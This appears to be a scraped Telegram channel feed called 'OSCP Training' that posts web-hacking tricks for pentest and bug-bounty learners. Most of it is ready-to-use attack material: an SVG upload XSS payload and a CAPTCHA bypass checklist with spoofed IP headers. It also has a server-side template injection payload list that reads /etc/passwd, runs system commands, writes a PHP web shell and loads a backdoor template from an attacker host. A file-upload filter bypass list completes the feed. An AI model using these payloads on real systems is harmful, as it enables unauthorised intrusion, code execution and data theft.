🔥OSCP Training🔥🛡⚔️👨🏻‍💻

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.

Many file uploads allow SVGs and are prone to tampering.

<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>

👍13❤1

18.4K views05:50

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Tryhackme.pdf

172.9 KB

Tryhackme.pdf

❤3

42.9K views02:18

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

CAPTCHA Bypass

* Send old captcha value.
* Send old captcha value with old session ID.
* Remove captcha with any adblocker and request again
* Bypass with OCR
* Response manipulation.
* Use any token with the same length(+1/-1).
* Remove the param value or remove the entire parameter.
* Change the method from POST to GET(or PUT) and remove the captcha.
* Change body to JSON or vice-versa.
* Check whether the value of the captcha is in the source code.
* Add headers:
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1

❤8👍4👏1🙏1

16.7K views17:12

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

APIs Fuzzing for Bug Bounty.pdf

198.4 KB

APIs Fuzzing for Bug Bounty.pdf

❤9👍1

11.6K views01:31

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

Google Dorks to Find Sensitive data or dir

👍4❤1🔥1

10.6K views15:58

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

SSTI (Server Side Template Injection)

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}

👍10❤2🔥2

13K views06:42

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

0:06

This media is not supported in your browser

VIEW IN TELEGRAM

@OSCP_training

@WebHacking

❤8👍3

13.4K views10:34

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

File Upload Bypass -

Blacklisting Bypass
PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr

Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

👍21❤4🔥2

17.7K views12:29